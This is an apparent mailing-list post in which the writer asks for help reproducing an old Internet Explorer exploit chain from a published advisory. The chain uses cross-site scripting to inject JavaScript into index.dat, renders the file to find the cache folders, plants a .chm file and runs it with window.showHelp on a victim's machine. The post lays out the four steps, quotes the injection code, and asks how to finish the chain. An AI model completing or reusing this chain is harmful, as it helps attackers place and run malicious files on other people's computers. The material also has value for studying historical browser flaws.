HI All,
I am testing Cross-Site Scripting to Inject and run malicious code. I was
following Georgi Guninski�s Advisory, which was published on Date: 23 November
2000.
Following this advisory, I am trying to inject some malicious file at victim�s
machine & then to run that injected file.
According to this advisory we have to perform following four steps to Inject
some file & Run that file.
1) inject JavaScript in �Index.dat� by
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>") The
JavaScript is executed in index.dat and has access to its content, which allow
to find the random directory names
2) parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary
Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>
3) After the Temporary internet Files Folders are known inject for example chm
files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
I am clear up to the second step he has specified, but I am not clear with the
third and fourth stage. The third stage is going to inject chm1.chm file at
the victim�s machine, but it is not clear whether this file is situated at
victim�s machine or attacker�s machine? Also where this file will be stored at
victim�s machine? This step also doesn�t use the name of random directories we
have found in the 2nd step so I don�t know why the second step is required &
how we can write Java script to find random folders from the �Index.dat� file?
The code for injecting Java Script into Index.dat & displaying content of the
index.dat file is given as:
<SCRIPT>
b=window.open("http://10.10.10.10?<SCRIPT>a=window.open();a.document.body.inne
rHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
setTimeout("document.writeln(s)",10000);
</SCRIPT>
This code should return output of file index.dat in to new blank window but
when I tried this I didn�t get output of index.dat file into new window,
instead I got output of index.dat in the same window in which I had written
this code.
I think to run Java Script, stored into index.dat file, first there is need to
create a object that captures all the contents of the index.dat file and then
we should create a new window & assign its �Inner HTML Code� to the contents
of the object created. I don�t know whether it make sense or not. But I am
trying to do something like that.
Any Help on the above topics will be highly appreciated.
Thanking You,
Sincerely,
Indian Tiger, CISSP
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
